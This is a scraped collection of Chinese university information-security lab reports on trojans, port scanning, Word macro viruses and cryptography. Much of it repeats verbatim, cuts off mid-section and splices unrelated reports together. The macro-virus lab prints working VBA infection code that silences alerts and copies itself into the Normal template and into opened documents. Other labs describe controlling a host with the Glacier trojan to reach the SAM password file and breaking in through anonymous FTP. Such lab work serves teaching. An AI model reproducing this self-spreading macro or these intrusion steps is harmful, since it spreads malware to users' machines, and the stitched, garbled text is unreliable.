信息安全实验报告

信息安全实验报告

南昌航空大学实验报告

课程名称:信息安全实验名称:共五次实验

班级:姓名:同组人:

指导教师评定:签名:

实验一木马攻击与防范

一、实验目的

通过对木马的练习,使读者理解和掌握木马传播和运行的机制;通过手动删除木马,掌握检查木马和删除木马的技巧,学会防御木马的相关知识,加深对木马的安全防范意识。

二、实验原理

木马的全称为特洛伊木马,源自古希腊神话。木马是隐藏在正常程序中的具有特殊功能的恶意代码,是具备破坏、删除和修改文件、发送密码、记录键盘、实施DoS攻击甚至完全控制计算机等特殊功能的后门程序。它隐藏在目标计算机里,可以随计算机自动启动并在某一端口监听来自控制端的控制信息。

1.木马的特性

(1)伪装性

(2)隐藏性

(3)破坏性

(4)窃密性

2.木马的入侵途径

木马入侵的主要途径是通过一定的欺骗方法,如更改图标、把木马文件与普通文件合并,欺骗被攻击者下载并执行做了手脚的木马程序,就会把木马安装到被攻击者的计算机中。

3.木马的种类

(1)按照木马的发展历程,可以分为4个阶段:第1代木马是伪装型病毒,第2代木马是网络传播型木马,第3代木马在连接方式上有了改进,利用了端口反弹技术,例如灰鸽子木马,第4代木马在进程隐藏方面做了较大改动,让木马服务器端运行时没有进程,网络操作插入到系统进程或者应用进程中完成,例如广外男生木马。

(2)按照功能分类,木马又可以分为:破坏型木马,主要功能是破坏并删除文件;服务型木马; DoS攻击型木马;远程控制型木马

三、实验环境

两台运行Windows 2000/XP的计算机,通过网络连接。使用“冰河”和“广外男生”木马作为练习工具。

四、实验内容和结果

任务一“冰河”木马的使用

1.使用“冰河”对远程计算机进行控制

我们在一台目标主机上植入木马,在此主机上运行

G_Server,作为服务器端;在另一台主机上运行G_Client,作为控制端。

打开控制端程序,单击快捷工具栏中的“添加主机”按钮,弹出如图1-5所示对对话框。

删除注册表中木马文件

删除注册表中木马文件

五,实验感想

通过本次实验了解的一些木马的传播技巧,通过自己动手实践,删除木马,学会了防御木马的一些基本技巧,加深了网络安全的认识。

实验二网络端口扫描

一、实验目的

通过练习使用网络端口扫描器,可以了解目标主机开放的端口和服务程序,从而获取系统的有用信息,发现网络系统的安全漏洞。在实验中,我们将在Windows操作系统下使用Superscan进行网络端口扫描实验,通过端口扫描实验,可以增强学生在网络安全方面的防护意识。利用综合扫描软件“流光”扫描系统的漏洞并给出安全性评估报告。

二、实验原理

(一).端口扫描的原理

一个开放的网络端口就是一条与计算机进行通信的信道,对网络端口的扫描可以得到目标计算机开放的服务程序、运行的系统版本信息,从而为下一步的入侵做好准备。对网络端口的扫描可以通过执行手工命令实现,但效率较低;也可以通过扫描工具实现,效率较高。扫描工具是对目标主机的安全性弱点进行扫描检测的软件。它一般具有数据分析功能,通过对端口的

扫描分析,可以发现目标主机开放的端口和所提供的服务以及相应服务软件版本和这些服务及软件的安全漏洞,从而能及时了解目标主机存在的安全隐患。

1.端口的基础知识

端口是TCP协议中所定义的,TCP协议通过套接字(socket)建立起两台计算机之间的网络连接。TCP/UDP的端口号在0~65535范围之内,其中1024以下的端口保留给常用的网络服务。例如,21端口为>服务,23端口为TELNET服务,25端口为SMTP服务,80端口为HTTP服务,110端口为POP3服务等。

2.扫描的原理

扫描的方式有多种,为了理解扫描原理,需要对TCP协议简要介绍一下。

一个TCP头的数据包格式如图2-1所示。它包括6个标志位,其中:

删除注册表中木马文件

删除注册表中木马文件

五,实验感想

通过本次实验了解的一些木马的传播技巧,通过自己动手实践,删除木马,学会了防御木马的一些基本技巧,加深了网络安全的认识。

实验二网络端口扫描

一、实验目的

通过练习使用网络端口扫描器,可以了解目标主机开放的端口和服务程序,从而获取系统的有用信息,发现网络系统的安全漏洞。在实验中,我们将在Windows操作系统下使用Superscan进行网络端口扫描实验,通过端口扫描实验,可以增强学生在网络安全方面的防护意识。利用综合扫描软件“流光”扫描系统的漏洞并给出安全性评估报告。

二、实验原理

(一).端口扫描的原理

一个开放的网络端口就是一条与计算机进行通信的信道,对网络端口的扫描可以得到目标计算机开放的服务程序、运行的系统版本信息,从而为下一步的入侵做好准备。对网络端口的扫描可以通过执行手工命令实现,但效率较低;也可以通过扫描工具实现,效率较高。扫描工具是对目标主机的安全性弱点进行扫描检测的软件。它一般具有数据分析功能,通过对端口的扫描分析,可以发现目标主机开放的端口和所提供的服务以及相应服务软件版本和这些服务及软件的安全漏洞,从而能及时了解目标主机存在的安全隐患。

1.端口的基础知识

端口是TCP协议中所定义的,TCP协议通过套接字(socket)建立起两台计算机之间的网络连接。TCP/UDP的端口号在0~65535范围之内,其中1024以下的端口保留给常用的网络服务。例如,21端口为>服务,23端口为TELNET服务,25端口为SMTP服务,80端口为HTTP服务,110端口为POP3服务等。

2.扫描的原理

扫描的方式有多种,为了理解扫描原理,需要对TCP协议简要介绍一下。

一个TCP头的数据包格式如图2-1所示。它包括6个标志位,其中:

图2-1 TCP数据包格式

扫描往往是入侵的前奏,所以如何有效的屏蔽计算机的端口,保护自身计算机的安全,成为计算机管理人员首要考虑的问题。为了防止对计算机网络端口的扫描,我们可以采用端口扫描监测工具来监测对端口的扫描,防止端口信息外露。常用的端口扫描监测工具包括ProtectX、PortSentry等。此外,安装防火墙也是防止端口扫描的有效方法。

三、实验环境

两台预装Windows 2000/XP的计算机,通过网络相连。SuperScan和流光Fluxay软件。

四、实验内容和步骤

任务一使用SuperScan扫描

SuperScan具有端口扫描、主机名解析、Ping扫描的功能,其界面如图2-2所示。

1.主机名解析功能

在Hostname Lookup栏中,可以输入IP地址或者需要转换的域名,单击Lookup按钮就可以获得转换后的结果;单击Me按钮可以获得本地计算机的IP地址;单击Interfaces按钮可以获得本地计算机IP地址的详细设置。

2.端口扫描功能

图2-2SuperScan操作界面

图2-3 端口配置界面

SuperScan也提供了特定端口扫描的功能,在Scan Type栏中选中All select ports in list,就可以按照选定的端口扫描。

3.Ping功能

SuperScan软件的Ping功能提供了检测在线主机和判断网络状况的作用。通过在IP栏中输入起始和结束的IP地址,然后选中Scan Type栏中的Ping only即可单击Start启动Ping 扫描了。

任务二利用流光综合扫描

流光是一款非常优秀的综合扫描工具,不仅具有完善的扫描功能,而且自带了很多猜测器和入侵工具,可方便地利用扫描的漏洞进行入侵。启动后,主界面如图2-4所示。

图2-4主界面

1.扫描主机漏洞

(1)

图2-5扫描设置选项

然后,陆续单击“下一步”按钮,会弹出POP3版本信息和用户密码的对话框以及获取>的Banner、尝试匿名登录等对话框,可根据需要进行选择,本例以采用默认值。

图2-7 IPC设置选项

“下一步”,设置对IIS的漏洞扫描选项。之后点击“下一步”,弹出如图2-8所示对话框,这里流光提供了11个漏洞的扫描。可根据需要进行选择。

图2-8 PLUGINS设置选项

图2-9选项对话框

图2-10选择扫描引擎

选择默认的本地主机作为扫描引擎,单击“开始”按钮开始扫描,经过一段时间后,会有类似的扫描结果。

2.分析扫描结果并模拟入侵

(1)端口漏洞分析

我们发现被扫描主机开放的端口,有些开放的端口是极其不安全的,下面列举部分端口及其可能存在的威胁如下:

端口21:>端口,攻击者可能利用用户名和密码过于简单,甚至可以匿名登录的漏洞登录到目标主机上,并上传木马或者病毒而控制目标主机。

端口23:Telnet端口,如果目标主机开放23端口,但用户名和密码过于简单,攻击者破解后就可以登录主机并查看任何信息,甚至控制目标主机。

端口80:HTTP端口,此端口开放没有太大的危险,但如果目标主机有SQL注入的漏洞,攻击者就可能利用端口80进行攻击。

端口139:NETBIOS会话服务端口,主要用于提供Windows文件和打印机共享以及Unix中的Samba服务。139端口可以被

攻击者利用,建立IPC连接入侵目标主机,然后获得目标主机的root权限并放置木马。

端口443:网页浏览端口,主要用于HTTPS服务,是提供加密和通过安全端口传输的另一种HTTP。HTTPS服务一般是通过SSL来保证安全性的,但是SSL漏洞可能会受到黑客的攻击,比如可以黑掉在线银行系统、盗取信用卡帐好等。

端口3389:这个端口的开放使安装了终端服务和全拼输入法的Windows 2000服务器(sp1之前的版本)存在着远程者很容易的拿到Administrator组权限。

(2)>漏洞分析

当扫描结果中看到>的端口开放,且可以匿名登录,我们就直接利用“流光”提供的入侵菜单进行>登录,单击密码破解成功的账号,然后选择connect,直接通过>连接到目标主机上。这样就可以往目标主机上传任何文件。包括木马和病毒,可见>匿名登录的危害性。

利用help命令,查看>命令

五、实验感想

本次试验,在Windows操作系统中安装并运行SuperScan,扫描目标主机端口,嗅探网络服务和操作系统,提交扫描步骤和扫描结果,在Windows操作系统中安装并运行“流光”,查看并记录自己的机器的扫描结果,是否存在安全漏洞,学习net 相关命令的使用,尝试利用系统漏洞与目标主机建立连接

实验三脚本病毒和宏病毒分析

一、实验目的

通过这项实验旨在使学生掌握Office下宏病毒的基本原理,主要包括它的传染机制、破坏机制以及怎样清除Office下的宏病毒。

二、实验环境

操作系统环境:Windows98/NT/2000/XP 编程环境:Office VBA

三、实验基础知识要求

Office VBA编程环境

四、实验任务

1.任务性质:验证性实验

2.任务描述:下面的示例中给出的是一个Word宏病毒的示例程序(只有传染模块),仔细阅读源程序,掌握Word宏病毒的传染过程。

3.任务步骤:

(1)打开Word2000,新建一个文档名为“test”;

(2)点击“工具-宏-宏”,在对话框“宏的位置”选择“test”,在宏名中输入“autoclose”,然后点击“创建”按钮;

(3)在VBA编辑环境中输入示例程序中给出的代码,并保存,然后退出VBA;

(4)点击“工具-宏-宏”,在对话框中点击“管理器”按钮,在管理器对话框中点击“宏方案项”标签;在宏方案项有效范围的“test.doc”中将“NewMacros”改名为“AOPEDMOK”;

(5)点击“工具-宏-安全性”,在安全性对话框中的安全级标签中选择“低”,在可靠性来源标签中选择“信任对VB 项目的访问”;

(6)保存并关闭“test”文档;

(7)新建一个文档test1,关闭后重新打开,观察test1是否被感染。

(8)清除此宏病毒,即要同时删除normal模板、所有活动模板、和染毒文件的autoclose宏。

4.示例程序

Sub autoclose()

' autoclose Macro

' 宏在2005-8-26由 jingjd 创建

On Error Resume Next

Application.DisplayAlerts = wdAlertsNone

Application.EnableCancelKey = wdCancelDisabled

Application.DisplayStatusBar = False

二、实验原理

(一).端口扫描的原理

一个开放的网络端口就是一条与计算机进行通信的信道,对网络端口的扫描可以得到目标计算机开放的服务程序、运行的系统版本信息,从而为下一步的入侵做好准备。对网络端口的扫描可以通过执行手工命令实现,但效率较低;也可以通过扫描

工具实现,效率较高。扫描工具是对目标主机的安全性弱点进行扫描检测的软件。它一般具有数据分析功能,通过对端口的扫描分析,可以发现目标主机开放的端口和所提供的服务以及相应服务软件版本和这些服务及软件的安全漏洞,从而能及时了解目标主机存在的安全隐患。

1.端口的基础知识

端口是TCP协议中所定义的,TCP协议通过套接字(socket)建立起两台计算机之间的网络连接。TCP/UDP的端口号在0~65535范围之内,其中1024以下的端口保留给常用的网络服务。例如,21端口为>服务,23端口为TELNET服务,25端口为SMTP服务,80端口为HTTP服务,110端口为POP3服务等。

2.扫描的原理

扫描的方式有多种,为了理解扫描原理,需要对TCP协议简要介绍一下。

一个TCP头的数据包格式如图2-1所示。它包括6个标志位,其中:

图2-1 TCP数据包格式

扫描往往是入侵的前奏,所以如何有效的屏蔽计算机的端口,保护自身计算机的安全,成为计算机管理人员首要考虑的问题。为了防止对计算机网络端口的扫描,我们可以采用端口扫描监测工具来监测对端口的扫描,防止端口信息外露。常用的端口扫描监测工具包括ProtectX、PortSentry等。此外,安装防火墙也是防止端口扫描的有效方法。

三、实验环境

两台预装Windows 2000/XP的计算机,通过网络相连。SuperScan和流光Fluxay软件。

四、实验内容和步骤

任务一使用SuperScan扫描

SuperScan具有端口扫描、主机名解析、Ping扫描的功能,其界面如图2-2所示。

1.主机名解析功能

在Hostname Lookup栏中,可以输入IP地址或者需要转换的域名,单击Lookup按钮就可以获得转换后的结果;单击Me按钮可以获得本地计算机的IP地址;单击Interfaces按钮可以获得本地计算机IP地址的详细设置。

2.端口扫描功能

图2-2SuperScan操作界面

图2-3 端口配置界面

SuperScan也提供了特定端口扫描的功能,在Scan Type栏中选中All select ports in list,就可以按照选定的端口扫描。

3.Ping功能

SuperScan软件的Ping功能提供了检测在线主机和判断网络状况的作用。通过在IP栏中输入起始和结束的IP地址,然后选中Scan Type栏中的Ping only即可单击Start启动Ping 扫描了。

任务二利用流光综合扫描

流光是一款非常优秀的综合扫描工具,不仅具有完善的扫描功能,而且自带了很多猜测器和入侵工具,可方便地利用扫描的漏洞进行入侵。启动后,主界面如图2-4所示。

图2-4主界面

1.扫描主机漏洞

(1)

图2-5扫描设置选项

然后,陆续单击“下一步”按钮,会弹出POP3版本信息和用户密码的对话框以及获取>的Banner、尝试匿名登录等对话框,可根据需要进行选择,本例以采用默认值。

图2-7 IPC设置选项

“下一步”,设置对IIS的漏洞扫描选项。之后点击“下一步”,弹出如图2-8所示对话框,这里流光提供了11个漏洞的扫描。可根据需要进行选择。

图2-8 PLUGINS设置选项

图2-9选项对话框

图2-10选择扫描引擎

选择默认的本地主机作为扫描引擎,单击“开始”按钮开始扫描,经过一段时间后,会有类似的扫描结果。

2.分析扫描结果并模拟入侵

(1)端口漏洞分析

我们发现被扫描主机开放的端口,有些开放的端口是极其不安全的,下面列举部分端口及其可能存在的威胁如下:

端口21:>端口,攻击者可能利用用户名和密码过于简单,甚至可以匿名登录的漏洞登录到目标主机上,并上传木马或者病毒而控制目标主机。

端口23:Telnet端口,如果目标主机开放23端口,但用户名和密码过于简单,攻击者破解后就可以登录主机并查看任何信息,甚至控制目标主机。

端口80:HTTP端口,此端口开放没有太大的危险,但如果目标主机有SQL注入的漏洞,攻击者就可能利用端口80进行攻击。

端口139:NETBIOS会话服务端口,主要用于提供Windows文件和打印机共享以及Unix中的Samba服务。139端口可以被攻击者利用,建立IPC连接入侵目标主机,然后获得目标主机的root权限并放置木马。

端口443:网页浏览端口,主要用于HTTPS服务,是提供加密和通过安全端口传输的另一种HTTP。HTTPS服务一般是通过SSL来保证安全性的,但是SSL漏洞可能会受到黑客的攻击,比如可以黑掉在线银行系统、盗取信用卡帐好等。

端口3389:这个端口的开放使安装了终端服务和全拼输入法的Windows 2000服务器(sp1之前的版本)存在着远程者很容易的拿到Administrator组权限。

(2)>漏洞分析

当扫描结果中看到>的端口开放,且可以匿名登录,我们就直接利用“流光”提供的入侵菜单进行>登录,单击密码破解成功的账号,然后选择connect,直接通过>连接到目标主机上。这样就可以往目标主机上传任何文件。包括木马和病毒,可见>匿名登录的危害性。

利用help命令,查看>命令

五、实验感想

本次试验,在Windows操作系统中安装并运行SuperScan,扫描目标主机端口,嗅探网络服务和操作系统,提交扫描步骤和扫描结果,在Windows操作系统中安装并运行“流光”,查看并记录自己的机器的扫描结果,是否存在安全漏洞,学习net 相关命令的使用,尝试利用系统漏洞与目标主机建立连接

实验三脚本病毒和宏病毒分析

一、实验目的

通过这项实验旨在使学生掌握Office下宏病毒的基本原理,主要包括它的传染机制、破坏机制以及怎样清除Office下的宏病毒。

二、实验环境

操作系统环境:Windows98/NT/2000/XP 编程环境:Office VBA

三、实验基础知识要求

Office VBA编程环境

四、实验任务

1.任务性质:验证性实验

2.任务描述:下面的示例中给出的是一个Word宏病毒的示例程序(只有传染模块),仔细阅读源程序,掌握Word宏病毒的传染过程。

3.任务步骤:

(1)打开Word2000,新建一个文档名为“test”;

(2)点击“工具-宏-宏”,在对话框“宏的位置”选择“test”,在宏名中输入“autoclose”,然后点击“创建”按钮;

(3)在VBA编辑环境中输入示例程序中给出的代码,并保存,然后退出VBA;

(4)点击“工具-宏-宏”,在对话框中点击“管理器”按钮,在管理器对话框中点击“宏方案项”标签;在宏方案项有效范围的“test.doc”中将“NewMacros”改名为“AOPEDMOK”;

(5)点击“工具-宏-安全性”,在安全性对话框中的安全级标签中选择“低”,在可靠性来源标签中选择“信任对VB 项目的访问”;

(6)保存并关闭“test”文档;

(7)新建一个文档test1,关闭后重新打开,观察test1是否被感染。

(8)清除此宏病毒,即要同时删除normal模板、所有活动模板、和染毒文件的autoclose宏。

4.示例程序

Sub autoclose()

' autoclose Macro

' 宏在2005-8-26由 jingjd 创建

On Error Resume Next

Application.DisplayAlerts = wdAlertsNone Application.EnableCancelKey = wdCancelDisabled Application.DisplayStatusBar = False

'Options.VirusProtection = False

Options.SaveNormalPrompt = False

Const VirusName = "AOPEDMOK"

'MsgBox ActiveDocument.VBProject.VBComponents.Item (2).Name

'MsgBox ActiveDocument.VBProject.VBComponents (2).Name

Set Doc = ActiveDocument.VBProject.VBComponents Set Tmp = NormalTemplate.VBProject.VBComponents Const ExportSource = "E:\aopedmok.txt"

For j = 1 To Doc.Count

If Doc(j).Name = VirusName Then

DocInstalled = 1

Doc(j).Export ExportSource

End If

Next j

For i = 1 To Tmp.Count

If Tmp(i).Name = VirusName Then

TmpInstalled = 1

Tmp(i).Export ExportSource

End If

Next i

If TmpInstalled = 0 Then

Tmp.Import ExportSource

NormalTemplate.Save

End If

If DocInstalled = 0 Then

Doc.Import ExportSource

ActiveDocument.SaveAs ActiveDocument.FullName

End If

1.主机名解析功能

在Hostname Lookup栏中,可以输入IP地址或者需要转换的域名,单击Lookup按钮就可以获得转换后的结果;单击Me按钮可以获得本地计算机的IP地址;单击Interfaces按钮可以获得本地计算机IP地址的详细设置。

2.端口扫描功能

图2-2SuperScan操作界面

图2-3 端口配置界面

SuperScan也提供了特定端口扫描的功能,在Scan Type栏中选中All select ports in list,就可以按照选定的端口扫描。

3.Ping功能

SuperScan软件的Ping功能提供了检测在线主机和判断网络状况的作用。通过在IP栏中输入起始和结束的IP地址,然后选中Scan Type栏中的Ping only即可单击Start启动Ping 扫描了。

任务二利用流光综合扫描

流光是一款非常优秀的综合扫描工具,不仅具有完善的扫描功能,而且自带了很多猜测器和入侵工具,可方便地利用扫描的漏洞进行入侵。启动后,主界面如图2-4所示。

图2-4主界面

1.扫描主机漏洞

(1)

图2-5扫描设置选项

然后,陆续单击“下一步”按钮,会弹出POP3版本信息和用户密码的对话框以及获取>的Banner、尝试匿名登录等对话框,可根据需要进行选择,本例以采用默认值。

图2-7 IPC设置选项

“下一步”,设置对IIS的漏洞扫描选项。之后点击“下一步”,弹出如图2-8所示对话框,这里流光提供了11个漏洞的扫描。可根据需要进行选择。

图2-8 PLUGINS设置选项

网络信息安全实验报告 (2)范文精简版

网络信息安全实验报告 (2) 网络信息安全实验报告 (2) 引言 实验目的 本实验的主要目的是通过实际操作,深入理解网络信息安全的基本概念、攻击与防御的原理,并通过实验验证不同防御措施的有效性。 实验环境 本次实验使用了一台配置性能较高的个人电脑,操作系统为Windows 10。实验过程中使用了网络模拟工具、安全防护工具和虚拟机等软硬件设备。 实验过程 1. 设置实验环境 - 安装虚拟机软件 - 配置虚拟机网络 2. 实验一:模拟网络攻击 - 使用Kali Linux进行网络扫描

- 使用Metasploit进行远程漏洞利用 - 使用社交工程进行信息获取 3. 实验二:网络防御措施 - 配置防火墙规则 - 安装杀毒软件并进行扫描 - 加强用户密码强度 4. 分析实验结果 - 统计网络攻击的次数和方式 - 比较不同防御措施的效果 实验结果与分析 在实验过程中,成功模拟了多种网络攻击,并进行了相应的防御措施。通过统计实验结果,我们发现: - 使用Kali Linux进行网络扫描,可以获取目标主机的网络拓扑和开放端口信息。 - 使用Metasploit进行漏洞利用,在未及时更新系统补丁的情况下,可成功入侵目标主机。 - 社交工程是获取敏感信息的常见手段,通过发送钓鱼邮件可以获取用户的用户名和密码等重要信息。

在防御措施方面,我们采取了以下措施: - 配置了防火墙规则,限制了开放端口和外部访问。 - 安装了杀毒软件,并进行了定期扫描。 - 加强了用户密码强度,设置了复杂密码策略。 经过实验对比,我们发现以上防御措施可以有效减少网络攻击的发生和影响。 结论 通过本次实验,我们对网络信息安全有了更深入的理解。网络攻击日益增多,保护自己的信息安全已成为每个人都应该关注的问题。正确使用网络防护工具,采取合理的安全防护措施,加强自身的信息安全意识,可以有效提高网络信息安全的水平。我们将继续深入学习和研究网络信息安全的相关知识,为网络安全事业贡献一份力量。 参考文献 暂无 > 注:该文档为虚拟文档,仅用于示范使用Markdown文本格式输出。实际内容和数据可能与实验存在差异。实验中涉及到的软件和工具,请遵守相关法律法规,确保合法使用。

信息安全实验总结报告

信息安全实验总结报告 信息安全实验总结报告 篇一:信息安全实验报告 课程名称:信息安全实验名称:共五次实验班级:姓名:同组人: 指导教师评定:签名: 实验一木马攻击与防范 一、实验目的 通过对木马的练习,使读者理解和掌握木马传播和运行的机制;通过手动删除木马,掌握检查木马和删除木马的技巧,学会防御木马的相关知识,加深对木马的安全防范意识。 二、实验原理 木马的全称为特洛伊木马,源自古希腊神话。木马是隐藏在正常程序中的具有特殊功能的恶意代码,是具备破坏、删除和修改文件、发送密码、记录键盘、实施DoS攻击甚至完全控制计算机等特殊功能的后门程序。它隐藏在目标计算机里,可以随计算机自动启动并在某一端口监听来自控制端的控制信息。 1.木马的特性 (1)伪装性 (2)隐藏性 (3)破坏性(4)窃密性 2.木马的入侵途径 木马入侵的主要途径是通过一定的欺骗方法,如更改图标、把木马文件与普通文件合并,欺骗被攻击者下载并执行做了手脚的木马程序,就会把木马安装到被攻击者的计算机中。 3.木马的种类 (1)按照木马的发展历程,可以分为4个阶段:第1代木马是伪装型病毒,第2代木马是网络传播型木马,第3代木马在连接方式上有了改进,利用了端口反弹技术,例如灰鸽子木马,第4代木马在进程隐藏方面做了较大改动,让木马服务器端运行时没有进程,网络操作插入到系统进程或者应用进程中完成,例如广外男生木马。

(2)按照功能分类,木马又可以分为:破坏型木马,主要功能是破坏并删除文件;服务型木马; DoS攻击型木马;远程控制型木马 三、实验环境 两台运行Windows 2000/XP的计算机,通过网络连接。使用“冰河”和“广外男生”木马作为练习工具。 四、实验内容和结果 任务一“冰河”木马的使用 1.使用“冰河”对远程计算机进行控制 我们在一台目标主机上植入木马,在此主机上运行G_Server,作为服务器端;在另一台主机上运行G_Client,作为控制端。 打开控制端程序,单击快捷工具栏中的“添加主机”按钮,弹出如图1-5所示对对话框。 图1-5添加计算机 “显示名称”:填入显示在主界面的名称。 “主机地址”:填入服务器端主机的IP地址。 “访问口令”:填入每次访问主机的密码,“空”即可。 “监听端口”:“冰河”默认的监听端口是7626,控制端可以修改它以绕过防火墙。 单击“确定”按钮,即可以看到主机面上添加了test的主机,如图1-6所示。 图1-6添加test主机 这时单击test主机名,如果连接成功,则会显示服务器端主机上的盘符。图1-6显示了test主机内的盘符,表示连接成功。 这时我们就可以像操作自己的电脑一样操作远程目标电脑,比如打开C:WINNTsystem32config目录可以找到对方主机上保存用户口令的SAM文件。 “冰河”的大部分功能都是在这里实现的,单击“命令控制台”的标签,弹出命令控制台界面,如图1-7所示。 图1-7命令控制台界面 可以看到,命令控制台分为“口令类命令”、“控制类命令”、

信息安全技术实验报告

信息安全技术实验报告 信息安全技术实验报告 1、引言 在这一章节中,要介绍实验的背景和目的,并给出实验的整体概述。 2、实验设计 在这一章节中,要详细说明实验的设计和方法,包括实验所使用的设备和工具,实验所涉及的软件和硬件环境,以及实验的步骤和流程。 3、实验结果 在这一章节中,要展示实验的结果和数据,并进行相应的分析和解释。需要提供实验数据的图表和说明,以支持实验结果的正确性和可靠性。 4、实验讨论 在这一章节中,要对实验的结果进行详细的讨论和分析,包括实验结果与实验目的的一致性、实验中可能存在的不确定性和误差以及实验结果的意义和应用。 5、实验总结

在这一章节中,要对整个实验进行总结和评价,并提出可能的改进和建议。同时,还要对实验过程中的问题和困难进行反思和总结,以便未来的实验能够更加顺利和有效地进行。 6、附录 在这一章节中,要给出实验过程中使用的代码、配置文件、数据等附件的详细说明和说明。需要标明每个附件的名称、作用和相关信息。 本文所涉及的法律名词及注释: 1、信息安全:指在计算机系统和网络中,保护信息及其基础设施不受未经授权的访问、使用、披露、破坏、修改、干扰,以确保信息的保密性、完整性和可用性的一系列措施和技术。 2、数据隐私:指个人或组织的敏感信息和个人身份信息等数据的保护,以确保不被未经授权的访问、使用、披露和存储。 3、网络攻击:指对计算机系统和网络进行非法的访问、入侵、破坏、干扰或盗取信息等行为。 4、防火墙:指一种安全设备或软件,用于过滤网络流量,防止未经授权的访问和网络攻击。 本文档涉及附件:

1、实验代码:文件名为《实验代码:zip》,包含所有实验所需的代码和脚本文件。 2、实验数据:文件名为《实验数据:xlsx》,包含所有实验所的数据和结果。 3、实验配置文件:文件名为《实验配置文件:txt》,包含实验过程中使用的配置文件和参数。

《网络信息安全》实验报告1 密码技术

《网络信息安全》实验报告(1) 实验名称:________________ 指导教师:___________ 完成日期:________________ 专 业:________________ 班 级:___________ 姓 名:________________ 一、实验目的: 掌握典型的单表代换和多表代换的加密方法的实现细节。能利用编程工具实现简单的加密解密。 了解WinRAR 软件加密文件时使用的是AES 算法,了解WinRAR 软件的常用功能,并能够利用该软件对文件进行加密;了解RAR 加密文件破解的方法,能够利用破解工具对弱口令RAR 加密文件进行破解。 理解数字摘要的原理;能够利用现有软件工具进行MD5摘要的计算;了解MD5在实际数据库应用系统中的应用;能够进行简单的MD5摘要破解。 二、实验内容: 1、编程实现凯撒密码的加密和解密。 要求:既可以进行加密转换,也可以进行解 密转换。程序参考界面如右所示。可以使用任何编 程工具,能处理英文即可。 2、(选做)编程实现维吉尼亚密码的加密 和解密。 要求:既可以进行加密转换,也可以进行解 密转换。程序参考界面如右所示。可以使用任何编 程工具,能处理英文即可。 3、尝试破译如下密文: byvu mqi byau q ren ev sxesebqjui, oek duluh adem mxqj oek qhu weddq wuj. BYVUMQIBYAUQRENEVSXESEBQJUIOEKDULUHA DEMMXQJOEKQHUWEDDQWUJ 注:空格和标点符号未加密。 4、(选做)利用C#语言提供的工具,在 网上查询相关资料,编程对字符串或文件进行 DES 加密、解密。 5、在电脑中安装“WinRAR ”软件,了解该软件的常用功能;利用WinRAR 对一个隐私文件进行加密,检查加密的安全性;了解RAR 加密文件破解的方法,自行寻找工具对老师提供的加密rar 文件进行破解。 6、自行寻找一款能够计算文件MD5摘要值的软件,对一个文本文件(或其他类型文件)进行摘要值计算并记录。将该文件内容进行稍许修改后再进行一次摘要值计算并记录,比较两次摘要值。 7、自行寻找一款能够计算字符串MD5摘要值的软件,对一个任意字符串进行摘要值计算并记录。对该字符串内容进行稍许修改后再进行一次摘要值计算并记录,比较两次摘要值。 8、自行寻找方法找到以下三个md5值的原文(字符串) 3508d8fedc70d04c5d178dbbc2eac72a (7位,纯数字) 密码技术 2015-9-24 计算机科学与技术 网络工程

信息安全实验报告信息安全概论课程设计报告书

郑州轻工业学院课程设计报告 名称:信息安全概论 指导教师:吉星、程立辉 姓名:符豪 学号:541307030112 班级:网络工程13-01

1.目的 数据加密技术要求只有在指定的用户或网络下,才能解除密码而获得原来的数据,这就需要给数据发送方和接受方以一些特殊的信息用于加解密,这就是所谓的密钥。其密钥的值是从大量的随机数中选取的。按加密算法分为专用密钥和公开密钥两种。数据加密技术是网络中最基本的安全技术,主要是通过对网络中传输的信息进行数据加密来保障其安全性,这是一种主动安全防御策略,用很小的代价即可为信息提供相当大的安全保护。 2.题目 使用C#编程语言,进行数据的加密与解密。 系统基本功能描述如下: 1、实现DES算法加密与解密功能。

2、实现TripleDES算法加密与解密功能。 3、实现MD5算法加密功能。 4、实现RC2算法加密与解密功能。 5、实现TripleDES算法加密与解密功能。 6、实现RSA算法加密与解密功能。 3.功能描述 使用该软件在相应的文本框中输入明文,然后点击加密就会立即转化成相应的密文,非常迅速和方便,而且操作简单加流畅,非常好用。 4.需求分析 加密软件发展很快,目前最常见的是透明加密,透明加密是一种根据要求在操作系统层自动地对写入存储介质的数据进行加密的技术。透明加密软件作为一种新的数据保密手段,自2005年上市以来,得到许多软件公司特别是制造业软件公司和传统安全软件公司的热捧,也为广大需要对敏感数据进行保密的客户带来了希望。加密软件上市以来,市场份额逐年上升,同时,经过几年的实践,客户对软件开发商提出了更多的要求。与加密软件产品刚上市时前一两年各软件厂商各持一词不同,经过市场的几番磨炼,客户和厂商对透明加密软件有了更加统一的认识。 5.设计说明 传统的周边防御,比如防火墙、入侵检测和防病毒软件,已经不再能够解决很多今天的数据保护问题。为了加强这些防御措施并

信息安全实验报告

信息安全实验报告

————————————————————————————————作者:————————————————————————————————日期: ﻩ

信息安全基础实验报告 姓名:田廷魁学号:2 班级:网工1201班 ARP欺骗工具及原理分析(Sniffer网络嗅探器) 一.实验目的和要求 实验目的: 1.熟悉ARP欺骗攻击有哪些方法。 2.了解ARP欺骗防范工具的使用。 3.掌握ARP欺骗攻击的实验原理。 实验要求: 下载相关工具和软件包(ARP攻击检测工具,局域网终结者,网络执法官,ARPsniffer嗅探工具)。 二.实验环境(实验所用的软硬件) ARP攻击检测工具 局域网终结者ﻫ网络执法官 ARPsniffer嗅探工具 三.实验原理 ARP(AddressResolutionProtocol)即地址解析协议,是一种将IP地址转化成物理地址的协议。不管网络层使用什么协议,在网络链路上传送数据帧时,最终还是必须使用硬件地址的。而每台机器的MAC地址都是不一样的,具有全球唯一性,因此可以作为一台主机或网络设备的标识。目标主机的MAC地址就是通过ARP协议获得的。

ARP欺骗原理则是通过发送欺骗性的ARP数据包致使接收者收到数据包后更新其ARP缓存表,从而建立错误的IP与MAC对应关系,源主机发送数据时数据便不能被正确地址接收。 四.实验内容与步骤 1、利用ARPsniffer嗅探数据 实验须先安装winpcap.exe它是arpsniffer.exe运行的条件,接着在arp sniffer.exe同一文件夹下新建记事本,输入Start cmd.exe ,保存为cmd.bat。ARPsniffer有很多种欺骗方式,下面的例子是其中的一种。 安装截图:

信息安全实验报告

实验报告 (201/201学年第学期) 课程名称信息安全技术 实验名称防火墙和安全IP实验 实验时间 年月日指导单位 指导教师

